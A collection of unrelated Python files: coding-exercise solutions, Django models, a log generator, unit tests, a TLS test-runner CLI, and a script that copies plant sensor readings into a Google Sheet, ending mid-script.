return curr.count_leaf # Case 1:'?'를 만나는 순간 하위 개수 return
if match_fail is True:
return 0 # Case 2: 매치 단어 없음
return 1 # Case 3: 단어 일치
def solution(words, queries):
tries = dict()
inv_tries = dict()
# 글자 수 별로 Trie를 만들어주고 단어들을 삽입해줌
for word in words:
word_len = len(word)
if word_len not in tries:
tries[word_len] = Trie() # Trie 초기 생성
inv_tries[word_len] = Trie()
tries[word_len].insert(word) # Trie에 삽입
inv_tries[word_len].insert(word[::-1]) # 전위 와일드카드를 위해 생성(역순으로 생성)
answer = list()
for query in queries:
query_len = len(query)
if query_len not in tries: # Case 1: 글자 수 맞지 않는 경우
answer.append(0)
elif query.count('?') == query_len: # Case 2: 모든 글자가 '?'인 경우
answer.append(tries[query_len].word_count)
elif query[0] == '?': # Case 3: 전위 와일드카드(역순으로 해결)
answer.append(inv_tries[query_len].search(query[::-1]))
else: # Case 4: 후위 와일드카드
answer.append(tries[query_len].search(query))
return answer
words = ["frodo", "front", "frost", "frozen", "frame", "kakao"]
queries = ["fro??", "????o", "fr???", "fro???", "pro?"]
print(solution(words, queries))
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import random
origin = [0, 0] # 设定原点[0, 0]
def create(pos=origin):
def move(direction, step):
# new_x = pos[0] + direction[0]*step
# new_y = pos[1] + direction[1]*step
# pos = [new_x, new_y] 这种赋值的方式会报错
pos[0] += direction[0] * step
pos[1] += direction[1] * step
print(pos)
return pos
return move
hu = create()
hu([0, 1], 10)
print('另一种实现方式!!!!!!!!!!!')
# 既然这样,我为什么不用类呢!!!!!!!!!!!!!!!
# 注意:下面的方法并非闭包
class Player(object):
def __init__(self, name):
self.name = name
self.pos = [random.randint(-20, 20), random.randint(-20, 20)]
print('%s的初始坐标为[%d, %d]' % (self.name, self.pos[0], self.pos[1]))
def move(self, direction, step):
if direction not in (1, 2, 3, 4):
print('错误!输入的方向必须在(1, 2, 3, 4)之中!')
elif isinstance(step, int) or isinstance(step, float):
# 实现方式1---------------------------------------
# def up(direction):
# self.pos[1] += step
# return self, '上'
# def down(direction):
# self.pos[1] -= step
# return self, '下'
# def left(direction):
# self.pos[0] -= step
# return self, '左'
# def right(direction):
# self.pos[0] += step
# return self, '右'
# operator = {1: up, 2: down, 3: left, 4: right}
# move_res = operator[direction](direction)
# print('%s向%s移动了%d步,移动后的坐标为[%d, %d]' % (self.name, move_res[1], step, self.pos[0], self.pos[1]))
# 实现方式2---------------------------------------
def up():
tar_pos = self.pos[1] + step
return self.pos[0], tar_pos, '上'
def down():
tar_pos = self.pos[1] - step
return self.pos[0], tar_pos, '下'
def left():
tar_pos = self.pos[0] - step
return tar_pos, self.pos[1], '左'
def right():
tar_pos = self.pos[0] + step
return tar_pos, self.pos[1], '右'
# 返回的self.pos[0]和self.pos[1]只在up()函数内有效,无法改变环境变量self的内容
operator = {1: up(), 2: down(), 3: left(), 4: right()}
move_res = operator[direction]
# 返回的move_res变量是一个list,需要将list的前两项赋值给self对象对应的值
self.pos[0] = move_res[0]
self.pos[1] = move_res[1]
print('%s向%s移动了%d步,移动后的坐标为[%d, %d]'
% (self.name, move_res[2], step, self.pos[0], self.pos[1]))
else:
print('错误!输入的步数必须为int或float!')
test = Player('testname')
test.move(1, 10)
test.move(3, 8)
|
# models.py
from django.db import models
from django.conf import settings
from django.db.models.signals import post_save
from django.dispatch import receiver
from rest_framework.authtoken.models import Token
@receiver(post_save, sender=settings.AUTH_USER_MODEL)
def create_auth_token(sender, instance=False, created=False, **kwargs):
if created:
Token.objects.create(user=instance)
class Board(models.Model):
title = models.CharField(max_length=30)
content_type = models.CharField(max_length=20)
content = models.TextField()
write_date = models.DateTimeField(auto_now_add=True)
class Knight(models.Model):
knightId = models.IntegerField(default=0, help_text="카드번호",unique=True)
name = models.CharField(max_length=30)
evlYn = models.CharField(max_length=1)
class SelectKnight(models.Model):
username = models.CharField(max_length=30)
knightId = models.IntegerField(default=0, help_text="카드번호")
class User(models.Model):
username = models.CharField(max_length=30,unique=True)
joinYn = models.CharField(max_length=1)
readyYn = models.CharField(default='N',max_length=1)
hosuYn = models.CharField(default='N', max_length=1, help_text="호수의여신")
assinKnightId = models.IntegerField(default=0, help_text="지정카드")
class GameHistory(models.Model):
gameId = models.IntegerField(default=0, help_text="원정번호")
username = models.CharField(default='N',max_length=30)
succYn = models.CharField(default='N',max_length=1)
winYn = models.CharField(default='N',max_length=1)
knightId = models.IntegerField(default=0, help_text="지정카드")
class Game(models.Model):
gameId = models.IntegerField(default=0, help_text="원정번호")
joinUserCnt = models.IntegerField(default=0, help_text="참여인수")
expeditionSeq = models.IntegerField(default=1, help_text="진행중회차")
completeYn = models.CharField(default='N', max_length=1)
class Expedition(models.Model):
gameId = models.IntegerField(default=0, help_text="원정번호")
expeditionSeq = models.IntegerField(default=0, help_text="원정회차")
expeditionUserCnt = models.IntegerField(default=0, help_text="원정참여유저")
succUserCnt = models.IntegerField(default=0, help_text="원정참여유저")
succYn = models.CharField(default='N', max_length=1)
completeYn = models.CharField(default='N', max_length=1)
usernamelist = models.CharField(max_length=150)
class Election(models.Model):
gameId = models.IntegerField(default=0, help_text="원정번호")
expeditionSeq = models.IntegerField(default=0, help_text="원정회차")
username = models.CharField(max_length=30)
succYn = models.CharField(default='N', max_length=1) |
from functools import reduce
import operator
def max_product(lst, n_largest_elements):
return reduce(operator.mul, sorted(lst)[-n_largest_elements:])
'''
Introduction and Warm-up (Highly recommended)
Playing With Lists/Arrays Series
Task
Given an array/list [] of integers , Find the product of the k maximal numbers.
Notes
Array/list size is at least 3 .
Array/list's numbers Will be mixture of positives , negatives and zeros
Repetition of numbers in the array/list could occur.
Input >> Output Examples
maxProduct ({4, 3, 5}, 2) ==> return (20)
Explanation:
Since the size (k) equal 2 , then the subsequence of size 2 whose gives
product of maxima is 5 * 4 = 20 .
maxProduct ({8, 10 , 9, 7}, 3) ==> return (720)
Explanation:
Since the size (k) equal 3 , then the subsequence of size 2 whose gives
product of maxima is 8 * 9 * 10 = 720 .
maxProduct ({10, 8, 3, 2, 1, 4, 10}, 5) ==> return (9600)
Explanation:
Since the size (k) equal 5 , then the subsequence of size 2 whose gives
product of maxima is 10 * 10 * 8 * 4 * 3 = 9600 .
maxProduct ({-4, -27, -15, -6, -1}, 2) ==> return (4)
Explanation:
Since the size (k) equal 2 , then the subsequence of size 2 whose gives
product of maxima is -4 * -1 = 4 .
maxProduct ({10, 3, -1, -27} , 3) return (-30)
Explanation:
Since the size (k) equal 3 , then the subsequence of size 2 whose gives
product of maxima is 10 * 3 * -1 = -30 .
'''
|
class Solution:
def mergeTwoLists(self, list1: Optional[ListNode], list2: Optional[ListNode]) -> Optional[ListNode]:
result = ListNode(0)
dummy = result
while list1 and list2:
if list1.val < list2.val:
dummy.next = list1
list1 = list1.next
else:
dummy.next = list2
list2 = list2.next
dummy = dummy.next
dummy.next = list1 if list1 else list2
return result.next
|
'''
Log generation simulation with different durations and rates.
'''
import os
import time
import random
from time import sleep
from datetime import datetime
import logging
log_format = '%(asctime)s %(levelname)s %(message)s'
logging.basicConfig(format=log_format, level=logging.INFO)
class LogGenerator:
'''
Simulation of log generator.
Args:
file (str): The file with the logs to monitor.
rate (int): The average of number of requests per sec.
ips (list): Random ips to choose from.
methods (list): Random methods to choose from.
sections (list): Random sections to choose from.
codes (list): Random codes to choose from.
'''
def __init__(self,
file="/tmp/access.log",
rate=20):
self.file = file
self.rate = rate
self.ips = ["::1", "192.168.0.110", "127.0.0.1", "60.242.26.14"]
self.methods = ["GET", "POST", "POST", "PUT", "DELETE"]
self.sections = ["/img", "/captcha", "/css", "/foo", "/foo", "/bar"]
self.codes = ["200", "200", "200", "200",
"200", "304", "403", "404", "501"]
def write_log(self, timestamp):
'''
Write a log entry, given a timestamp.
Args:
timestamp (str): A timestamp for the random log.
'''
with open(self.file, 'a+', os.O_NONBLOCK) as f:
f.write(self.generate_log(timestamp))
f.flush()
f.close()
def random_ip(self):
'''
Generate a random ip.
Returns:
(str): Generated random ip.
'''
return str(random.randint(0, 255)) + "." + str(random.randint(0, 255)) \
+ "." + str(random.randint(0, 255)) + "." \
+ str(random.randint(0, 255))
def generate_log(self, timestamp):
'''
Generate a log string given a timestamp.
Args:
timestamp (str): A timestamp for the random log.
Returns:
(str): a random generated log entry.
'''
ip = random.choice([random.choice(self.ips), self.random_ip()])
method = random.choice(self.methods)
section = random.choice(self.sections) \
+ random.choice([".html",
random.choice(self.sections)+'/',
random.choice(self.sections)+'/'])
code = random.choice(self.codes)
size = random.randint(10, 100000)
return ('%s - - [%s +1000] "%s %s HTTP/1.1" %s %d\n'
% (ip,
timestamp.strftime("%d/%b/%Y:%H:%M:%S"),
method,
section,
code,
size))
def run(self, duration):
'''
Run the log generation.
Args:
duration (str): duration of log generation simulation.
'''
start = time.time()
while time.time()-start < duration:
self.write_log(datetime.now())
sleep(random.random()*2/self.rate)
|
# -*- coding: utf-8 -*-
from app.models import Result, Season, Tournament
from app.tests import dbfixture, ResultData, TournamentData
from app.tests.models import ModelTestCase
from web import config
class TestResult(ModelTestCase):
def setUp(self):
super(TestResult, self).setUp()
self.data = dbfixture.data(TournamentData, ResultData)
self.data.setup()
def tearDown(self):
self.data.teardown()
def test_all(self):
all_results = Result.all()
self.assertEqual(len(all_results), 10)
def test_get(self):
results_season_1 = config.orm.query(Result).join(Result.tournament).join(Tournament.season).filter(Season.id == 1).all() #@UndefinedVariable
results_season_2 = config.orm.query(Result).join(Result.tournament).join(Tournament.season).filter(Season.id == 2).all() #@UndefinedVariable
self.assertEqual(len(results_season_1), 8)
self.assertEqual(len(results_season_2), 2)
def test_score(self):
result_franck_l = config.orm.query(Result).filter(Result.tournament_id == 1).filter(Result.user_id == 1).one() #@UndefinedVariable
result_franck_p = config.orm.query(Result).filter(Result.tournament_id == 1).filter(Result.user_id == 2).one() #@UndefinedVariable
result_fx = config.orm.query(Result).filter(Result.tournament_id == 1).filter(Result.user_id == 3).one() #@UndefinedVariable
result_jo = config.orm.query(Result).filter(Result.tournament_id == 1).filter(Result.user_id == 4).one() #@UndefinedVariable
result_nico = config.orm.query(Result).filter(Result.tournament_id == 1).filter(Result.user_id == 5).one() #@UndefinedVariable
self.assertIsNone(result_franck_l.score)
self.assertIsNone(result_fx.score)
self.assertEqual(result_franck_p.score, 67)
self.assertEqual(result_jo.score, 34)
self.assertEqual(result_nico.score, 5)
|
from __future__ import print_function, unicode_literals
import re
import os
import sys
import string
import argparse
import subprocess
from . import __version__, utils, results, bundles, testenv, formatters
class Unsupported(Exception):
pass
class ProcessFailed(Exception):
pass
class UnexpectedOutput(Exception):
pass
def output_info(formatter, args, runner_name="trytls"):
formatter.write_platform(utils.platform_info())
formatter.write_runner("{runner} {version} ({python})".format(
runner=runner_name,
version=__version__,
python=utils.python_info()
))
formatter.write_stub(args)
# A regex that matches to any byte that is not a 7-bit ASCII printable.
_NON_PRINTABLE_REX = re.compile(
b"[^" + b"".join(re.escape(x).encode("ascii") for x in string.printable) + b"]"
)
def _escape_match(match):
return "\\x{:02x}".format(ord(match.group(0))).encode("ascii")
def _escape_non_printable(byte_string):
r"""
Return the byte string, escaping all bytes outside printable
7-bit ASCII.
>>> _escape_non_printable(b"Hello, World!") == b"Hello, World!"
True
Non-printables are \xNN-escaped.
>>> _escape_non_printable(b"\x00\xff") == b"\\x00\\xff"
True
"""
return _NON_PRINTABLE_REX.sub(_escape_match, byte_string)
def run_stub(args, host, port, cafile=None):
args = args + [host, str(port)]
if cafile is not None:
args.append(cafile)
try:
process = subprocess.Popen(
args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
except OSError as ose:
raise ProcessFailed("failed to launch the stub", os.strerror(ose.errno))
out, _ = process.communicate()
out = _escape_non_printable(out).decode("ascii")
if process.returncode != 0:
raise ProcessFailed("stub exited with return code {}".format(process.returncode), out)
out = out.rstrip()
lines = out.splitlines()
if lines:
verdict = lines.pop()
if verdict == "ACCEPT":
return True, "".join(lines)
elif verdict == "REJECT":
return False, "".join(lines)
elif verdict == "UNSUPPORTED":
raise Unsupported("".join(lines))
raise UnexpectedOutput(out)
def collect(test, args):
try:
accept, details = run_stub(list(args), test.host, test.port, test.cafile)
except Unsupported as us:
return results.Skip(
reason="the stub couldn't implement the requested behaviour (e.g. setting CA certificate bundle)",
details=us.args[0])
except UnexpectedOutput as uo:
output = uo.args[0].strip()
if output:
return results.Error("unexpected output", output)
return results.Error("no output")
except ProcessFailed as pf:
return results.Error(pf.args[0], pf.args[1])
if accept and test.accept:
return results.Pass(details=details)
elif not accept and not test.accept:
return results.Pass(details=details)
elif not accept and test.accept:
return results.Fail(details=details)
else:
return results.Fail(details=details)
def run(formatter, args, tests):
fail_count = 0
error_count = 0
with formatter.tests() as writer:
for test, result in testenv.run(tests, collect, args):
writer.write_test(test, result)
if result.type == results.Fail:
fail_count += 1
elif result.type == results.Error:
error_count += 1
return fail_count == 0 and error_count == 0
def main():
parser = argparse.ArgumentParser(
usage="%(prog)s bundle command [arg ...]"
)
parser.add_argument(
"remainder",
help=argparse.SUPPRESS,
nargs=argparse.REMAINDER
)
args = parser.parse_args()
if args.remainder and args.remainder[0] == "--":
args.remainder.pop(0)
bundle_name = args.remainder[0] if args.remainder else None
parser.add_argument(
"--formatter",
help="formatter",
default="default"
)
args = parser.parse_args(args.remainder[1:], args)
if args.remainder and args.remainder[0] == "--":
args.remainder.pop(0)
command = args.remainder
create_formatter = formatters.load_formatter(args.formatter)
if create_formatter is None:
formatter_list = [" " + x for x in sorted(formatters.iter_formatters())]
parser.error(
"unknown formatter '{}'\n\n".format(args.formatter) +
"Valid formatter options:\n" + "\n".join(formatter_list)
)
if bundle_name is None:
bundle_list = [" " + x for x in sorted(bundles.iter_bundles())]
parser.error(
"missing the bundle argument\n\n" +
"Valid bundle options:\n" + "\n".join(bundle_list)
)
bundle = bundles.load_bundle(bundle_name)
if bundle is None:
parser.error("unknown bundle '{}'".format(bundle_name))
if not command:
parser.error("too few arguments, missing command")
with create_formatter(sys.stdout) as formatter:
output_info(formatter, command)
if not run(formatter, command, bundle):
# Return with a non-zero exit code if all tests were not successful. The
# CPython interpreter exits with 1 when an unhandled exception occurs,
# and with 2 when there is a problem with a command line parameter. The
# argparse module also uses the code 2 for the same purpose. Therefore
# the chosen return value here is 3.
return 3
return 0
if __name__ == "__main__":
sys.exit(main())
|
# My Original Code
# def replace_exclamation(s):
# vowels = ('a','e','i','o','u')
# for i in s:
# if i.lower() in vowels:
# s = s.replace(i, '!')
# return s
#Best Practice
def replace_exclamation(s):
return "".join("!" if i in "aeiouAEIOU" else i for i in s)
|
import gspread
from oauth2client.service_account import ServiceAccountCredentials
# use creds to create a client to interact with the Google Drive API
scope = ['https://spreadsheets.google.com/feeds' + ' ' +'https://www.googleapis.com/auth/drive']
creds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)
client = gspread.authorize(creds)
sheet = client.open("testing").sheet1
##sheet.update_cell(1,1, "Hey there")
import datetime
import schedule
import time
import codecs
import string
import glob
import os
row = 2
minute = 2
def job():
'''
Find latest file in folder
'''
list_of_files = glob.glob('C:/Users/Shane/Desktop/sort/*') # * means all if need specific format then *.csv
latest_file = max(list_of_files, key=os.path.getctime)
#print (latest_file)
latest_file_open = open(latest_file, "r")
#print(opened.read())
contents = latest_file_open.read()
#print(contents)
latest_file_open.close()
'''
split file into list
'''
contents1 = contents.split(",")
li = []
for i in contents1:
li.append(str(i))
'''
Set Variables
'''
global minute
if minute == 2:
date = ((li[30])[1::2])
date_modified = (date[11:30])
time = ((li[61])[1::2])
catalyst = ((li[62])[1::2])
methanol_1 = ((li[63])[1::2])
methanol_2 = ((li[64])[1::2])
reclaimed_methanol = ((li[65])[1::2])
dump_tank = ((li[66])[1::2])
dump_tank_flow_meter = ((li[67])[1::2])
tank_1 = ((li[68])[1::2])
tank_2 = ((li[69])[1::2])
tank_3 = ((li[70])[1::2])
disc_1_feed = ((li[71])[1::2])
disc_1_out = ((li[72])[1::2])
yg_offload_1 = ((li[73])[1::2])
yg_offload_2 = ((li[74])[1::2])
yg_15k_1 = ((li[75])[1::2])
yg_15k_2 = ((li[76])[1::2])
disc_2_feed = ((li[77])[1::2])
disc_2_out = ((li[78])[1::2])
wet_oil = ((li[79])[1::2])
waste = ((li[80])[1::2])
yg = ((li[81])[1::2])
bio_1 = ((li[82])[1::2])
bio_2 = ((li[83])[1::2])
bio_3 = ((li[84])[1::2])
glycerin = ((li[85])[1::2])
day_tank = ((li[86])[1::2])
backup_day_tank_5k = ((li[87])[1::2])
reclaimed_methanol_totalizer = ((li[88])[1::2])
feed_stock_totalizer = ((li[89])[1::2])
b100_temp = ((li[90])[1::2])
b100_temp_modified = b100_temp[0:8]
print('row 2')
print(time)
minute += 1
elif minute == 3:
date = ((li[30])[1::2])
date_modified = (date[11:30])
time = ((li[331])[1::2])
catalyst = ((li[332])[1::2])
methanol_1 = ((li[333])[1::2])
methanol_2 = ((li[334])[1::2])
reclaimed_methanol = ((li[335])[1::2])
dump_tank = ((li[336])[1::2])
dump_tank_flow_meter = ((li[337])[1::2])
tank_1 = ((li[338])[1::2])
tank_2 = ((li[339])[1::2])
tank_3 = ((li[340])[1::2])
disc_1_feed = ((li[341])[1::2])
disc_1_out = ((li[342])[1::2])
yg_offload_1 = ((li[343])[1::2])
yg_offload_2 = ((li[344])[1::2])
yg_15k_1 = ((li[345])[1::2])
yg_15k_2 = ((li[346])[1::2])
disc_2_feed = ((li[347])[1::2])
disc_2_out = ((li[348])[1::2])
wet_oil = ((li[349])[1::2])
waste = ((li[350])[1::2])
yg = ((li[351])[1::2])
bio_1 = ((li[352])[1::2])
bio_2 = ((li[353])[1::2])
bio_3 = ((li[354])[1::2])
glycerin = ((li[355])[1::2])
day_tank = ((li[356])[1::2])
backup_day_tank_5k = ((li[357])[1::2])
reclaimed_methanol_totalizer = ((li[358])[1::2])
feed_stock_totalizer = ((li[359])[1::2])
b100_temp = ((li[360])[1::2])
b100_temp_modified = b100_temp[0:8]
print('row 3')
print(time)
minute += 1
elif minute == 4:
date = ((li[30])[1::2])
date_modified = (date[11:30])
time = ((li[661])[1::2])
catalyst = ((li[662])[1::2])
methanol_1 = ((li[663])[1::2])
methanol_2 = ((li[664])[1::2])
reclaimed_methanol = ((li[665])[1::2])
dump_tank = ((li[666])[1::2])
dump_tank_flow_meter = ((li[667])[1::2])
tank_1 = ((li[668])[1::2])
tank_2 = ((li[669])[1::2])
tank_3 = ((li[670])[1::2])
disc_1_feed = ((li[671])[1::2])
disc_1_out = ((li[672])[1::2])
yg_offload_1 = ((li[673])[1::2])
yg_offload_2 = ((li[674])[1::2])
yg_15k_1 = ((li[675])[1::2])
yg_15k_2 = ((li[676])[1::2])
disc_2_feed = ((li[677])[1::2])
disc_2_out = ((li[678])[1::2])
wet_oil = ((li[679])[1::2])
waste = ((li[680])[1::2])
yg = ((li[681])[1::2])
bio_1 = ((li[682])[1::2])
bio_2 = ((li[683])[1::2])
bio_3 = ((li[684])[1::2])
glycerin = ((li[685])[1::2])
day_tank = ((li[686])[1::2])
backup_day_tank_5k = ((li[687])[1::2])
reclaimed_methanol_totalizer = ((li[688])[1::2])
feed_stock_totalizer = ((li[689])[1::2])
b100_temp = ((li[690])[1::2])
b100_temp_modified = b100_temp[0:8]
print ('row 4')
print(time)
minute += 1
elif minute == 5:
date = ((li[30])[1::2])
date_modified = (date[11:30])
time = ((li[931])[1::2])
catalyst = ((li[932])[1::2])
methanol_1 = ((li[933])[1::2])
methanol_2 = ((li[934])[1::2])
reclaimed_methanol = ((li[935])[1::2])
dump_tank = ((li[936])[1::2])
dump_tank_flow_meter = ((li[937])[1::2])
tank_1 = ((li[938])[1::2])
tank_2 = ((li[939])[1::2])
tank_3 = ((li[940])[1::2])
disc_1_feed = ((li[941])[1::2])
disc_1_out = ((li[942])[1::2])
yg_offload_1 = ((li[943])[1::2])
yg_offload_2 = ((li[944])[1::2])
yg_15k_1 = ((li[945])[1::2])
yg_15k_2 = ((li[946])[1::2])
disc_2_feed = ((li[947])[1::2])
disc_2_out = ((li[948])[1::2])
wet_oil = ((li[949])[1::2])
waste = ((li[950])[1::2])
yg = ((li[951])[1::2])
bio_1 = ((li[952])[1::2])
bio_2 = ((li[953])[1::2])
bio_3 = ((li[954])[1::2])
glycerin = ((li[955])[1::2])
day_tank = ((li[956])[1::2])
backup_day_tank_5k = ((li[957])[1::2])
reclaimed_methanol_totalizer = ((li[958])[1::2])
feed_stock_totalizer = ((li[959])[1::2])
b100_temp = ((li[960])[1::2])
b100_temp_modified = b100_temp[0:8]
print ('row 5')
print(time)
minute += 1
elif minute == 6:
date = ((li[30])[1::2])
date_modified = (date[11:30])
time = ((li[931])[1::2])
catalyst = ((li[932])[1::2])
methanol_1 = ((li[933])[1::2])
methanol_2 = ((li[934])[1::2])
reclaimed_methanol = ((li[935])[1::2])
dump_tank = ((li[936])[1::2])
dump_tank_flow_meter = ((li[937])[1::2])
tank_1 = ((li[938])[1::2])
tank_2 = ((li[939])[1::2])
tank_3 = ((li[940])[1::2])
disc_1_feed = ((li[941])[1::2])
disc_1_out = ((li[942])[1::2])
yg_offload_1 = ((li[943])[1::2])
yg_offload_2 = ((li[944])[1::2])
yg_15k_1 = ((li[945])[1::2])
yg_15k_2 = ((li[946])[1::2])
disc_2_feed = ((li[947])[1::2])
disc_2_out = ((li[948])[1::2])
wet_oil = ((li[949])[1::2])
waste = ((li[950])[1::2])
yg = ((li[951])[1::2])
bio_1 = ((li[952])[1::2])
bio_2 = ((li[953])[1::2])
bio_3 = ((li[954])[1::2])
glycerin = ((li[955])[1::2])
day_tank = ((li[956])[1::2])
backup_day_tank_5k = ((li[957])[1::2])
reclaimed_methanol_totalizer = ((li[958])[1::2])
feed_stock_totalizer = ((li[959])[1::2])
b100_temp = ((li[960])[1::2])
b100_temp_modified = b100_temp[0:8]
print ('row 5')
print(time)
minute += 1
elif minute == 7:
date = ((li[30])[1::2])
date_modified = (date[11:30])
time = ((li[1201])[1::2])
catalyst = ((li[1202])[1::2])
methanol_1 = ((li[1203])[1::2])
methanol_2 = ((li[1204])[1::2])
reclaimed_methanol = ((li[1205])[1::2])
dump_tank = ((li[1206])[1::2])
dump_tank_flow_meter = ((li[1207])[1::2])
tank_1 = ((li[1208])[1::2])
tank_2 = ((li[1209])[1::2])
tank_3 = ((li[1210])[1::2])
disc_1_feed = ((li[1211])[1::2])
disc_1_out = ((li[1212])[1::2])
yg_offload_1 = ((li[1213])[1::2])
yg_offload_2 = ((li[1214])[1::2])
yg_15k_1 = ((li[1215])[1::2])
yg_15k_2 = ((li[1216])[1::2])
disc_2_feed = ((li[1217])[1::2])
disc_2_out = ((li[1218])[1::2])
wet_oil = ((li[1219])[1::2])
waste = ((li[1220])[1::2])
yg = ((li[1221])[1::2])
bio_1 = ((li[1222])[1::2])
bio_2 = ((li[1223])[1::2])
bio_3 = ((li[1224])[1::2])
glycerin = ((li[1225])[1::2])
day_tank = ((li[1226])[1::2])
backup_day_tank_5k = ((li[1227])[1::2])
reclaimed_methanol_totalizer = ((li[1228])[1::2])
feed_stock_totalizer = ((li[1229])[1::2])
b100_temp = ((li[1230])[1::2])
b100_temp_modified = b100_temp[0:8]
print ('row 7')
print(time)
minute += 1
elif minute == 8:
date = ((li[30])[1::2])
date_modified = (date[11:30])
time = ((li[1861])[1::2])
catalyst = ((li[1862])[1::2])
methanol_1 = ((li[1863])[1::2])
methanol_2 = ((li[1864])[1::2])
reclaimed_methanol = ((li[1865])[1::2])
dump_tank = ((li[1866])[1::2])
dump_tank_flow_meter = ((li[1867])[1::2])
tank_1 = ((li[1868])[1::2])
tank_2 = ((li[1869])[1::2])
tank_3 = ((li[1870])[1::2])
disc_1_feed = ((li[1871])[1::2])
disc_1_out = ((li[1872])[1::2])
yg_offload_1 = ((li[1873])[1::2])
yg_offload_2 = ((li[1874])[1::2])
yg_15k_1 = ((li[1875])[1::2])
yg_15k_2 = ((li[1876])[1::2])
disc_2_feed = ((li[1877])[1::2])
disc_2_out = ((li[1878])[1::2])
wet_oil = ((li[1879])[1::2])
waste = ((li[1880])[1::2])
yg = ((li[1881])[1::2])
bio_1 = ((li[1882])[1::2])
bio_2 = ((li[1883])[1::2])
bio_3 = ((li[1884])[1::2])
glycerin = ((li[1885])[1::2])
day_tank = ((li[1886])[1::2])
backup_day_tank_5k = ((li[1887])[1::2])
reclaimed_methanol_totalizer = ((li[1888])[1::2])
feed_stock_totalizer = ((li[1889])[1::2])
b100_temp = ((li[1890])[1::2])
b100_temp_modified = b100_temp[0:8]
print ('row 8')
print(time)
minute += 1
elif minute == 9:
date = ((li[30])[1::2])
date_modified = (date[11:30])
time = ((li[2071])[1::2])
catalyst = ((li[2072])[1::2])
methanol_1 = ((li[2073])[1::2])
methanol_2 = ((li[2074])[1::2])
reclaimed_methanol = ((li[2075])[1::2])
dump_tank = ((li[2076])[1::2])
dump_tank_flow_meter = ((li[2077])[1::2])
tank_1 = ((li[2078])[1::2])
tank_2 = ((li[2079])[1::2])
tank_3 = ((li[2080])[1::2])
disc_1_feed = ((li[2081])[1::2])
disc_1_out = ((li[2082])[1::2])
yg_offload_1 = ((li[2083])[1::2])
yg_offload_2 = ((li[2084])[1::2])
yg_15k_1 = ((li[2085])[1::2])
yg_15k_2 = ((li[2086])[1::2])
disc_2_feed = ((li[2087])[1::2])
disc_2_out = ((li[2088])[1::2])
wet_oil = ((li[2089])[1::2])
waste = ((li[2090])[1::2])
yg = ((li[2091])[1::2])
bio_1 = ((li[2092])[1::2])
bio_2 = ((li[2093])[1::2])
bio_3 = ((li[2094])[1::2])
glycerin = ((li[2095])[1::2])
day_tank = ((li[2096])[1::2])
backup_day_tank_5k = ((li[2097])[1::2])
reclaimed_methanol_totalizer = ((li[2098])[1::2])
feed_stock_totalizer = ((li[2099])[1::2])
b100_temp = ((li[2100])[1::2])
b100_temp_modified = b100_temp[0:8]
print ('row 9')
print(time)
minute += 1
elif minute == 10:
date = ((li[30])[1::2])
date_modified = (date[11:30])
time = ((li[2431])[1::2])
catalyst = ((li[2432])[1::2])
methanol_1 = ((li[2433])[1::2])
methanol_2 = ((li[2434])[1::2])
reclaimed_methanol = ((li[2435])[1::2])
dump_tank = ((li[2436])[1::2])
dump_tank_flow_meter = ((li[2437])[1::2])
tank_1 = ((li[2438])[1::2])
tank_2 = ((li[2439])[1::2])
tank_3 = ((li[2440])[1::2])
disc_1_feed = ((li[2441])[1::2])
disc_1_out = ((li[2442])[1::2])
yg_offload_1 = ((li[2443])[1::2])
yg_offload_2 = ((li[2444])[1::2])
yg_15k_1 = ((li[2445])[1::2])
yg_15k_2 = ((li[2446])[1::2])
disc_2_feed = ((li[2447])[1::2])
disc_2_out = ((li[2448])[1::2])
wet_oil = ((li[2449])[1::2])
waste = ((li[2450])[1::2])
yg = ((li[2451])[1::2])
bio_1 = ((li[2452])[1::2])
bio_2 = ((li[2453])[1::2])
bio_3 = ((li[2454])[1::2])
glycerin = ((li[2455])[1::2])
day_tank = ((li[2456])[1::2])
backup_day_tank_5k = ((li[2457])[1::2])
reclaimed_methanol_totalizer = ((li[2458])[1::2])
feed_stock_totalizer = ((li[2459])[1::2])
b100_temp = ((li[2460])[1::2])
b100_temp_modified = b100_temp[0:8]
print ('row 10')
print (time)
minute += 1
elif minute == 11:
date = ((li[30])[1::2])
date_modified = (date[11:30])
time = ((li[2761])[1::2])
catalyst = ((li[2762])[1::2])
methanol_1 = ((li[2763])[1::2])
methanol_2 = ((li[2764])[1::2])
reclaimed_methanol = ((li[2765])[1::2])
dump_tank = ((li[2766])[1::2])
dump_tank_flow_meter = ((li[2767])[1::2])
tank_1 = ((li[2768])[1::2])
tank_2 = ((li[2769])[1::2])
tank_3 = ((li[2770])[1::2])
disc_1_feed = ((li[2771])[1::2])
disc_1_out = ((li[2772])[1::2])
yg_offload_1 = ((li[2773])[1::2])
yg_offload_2 = ((li[2774])[1::2])
yg_15k_1 = ((li[2775])[1::2])
yg_15k_2 = ((li[2776])[1::2])
disc_2_feed = ((li[2777])[1::2])
disc_2_out = ((li[2778])[1::2])
wet_oil = ((li[2779])[1::2])
waste = ((li[2780])[1::2])
yg = ((li[2781])[1::2])
bio_1 = ((li[2782])[1::2])
bio_2 = ((li[2783])[1::2])
bio_3 = ((li[2784])[1::2])
glycerin = ((li[2785])[1::2])
day_tank = ((li[2786])[1::2])
backup_day_tank_5k = ((li[2787])[1::2])
reclaimed_methanol_totalizer = ((li[2788])[1::2])
feed_stock_totalizer = ((li[2789])[1::2])
b100_temp = ((li[2790])[1::2])
b100_temp_modified = b100_temp[0:8]
print ('row 11')
print (time)
minute += 1
elif minute == 12:
date = ((li[30])[1::2])
date_modified = (date[11:30])
time = ((li[3031])[1::2])
catalyst = ((li[3032])[1::2])
methanol_1 = ((li[3033])[1::2])
methanol_2 = ((li[3034])[1::2])
reclaimed_methanol = ((li[3035])[1::2])
dump_tank = ((li[3036])[1::2])
dump_tank_flow_meter = ((li[3037])[1::2])
tank_1 = ((li[3038])[1::2])
tank_2 = ((li[3039])[1::2])
tank_3 = ((li[3040])[1::2])
disc_1_feed = ((li[3041])[1::2])
disc_1_out = ((li[3042])[1::2])
yg_offload_1 = ((li[3043])[1::2])
yg_offload_2 = ((li[3044])[1::2])
yg_15k_1 = ((li[3045])[1::2])
yg_15k_2 = ((li[3046])[1::2])
disc_2_feed = ((li[3047])[1::2])
disc_2_out = ((li[3048])[1::2])
wet_oil = ((li[3049])[1::2])
waste = ((li[3050])[1::2])
yg = ((li[3051])[1::2])
bio_1 = ((li[3052])[1::2])
bio_2 = ((li[3053])[1::2])
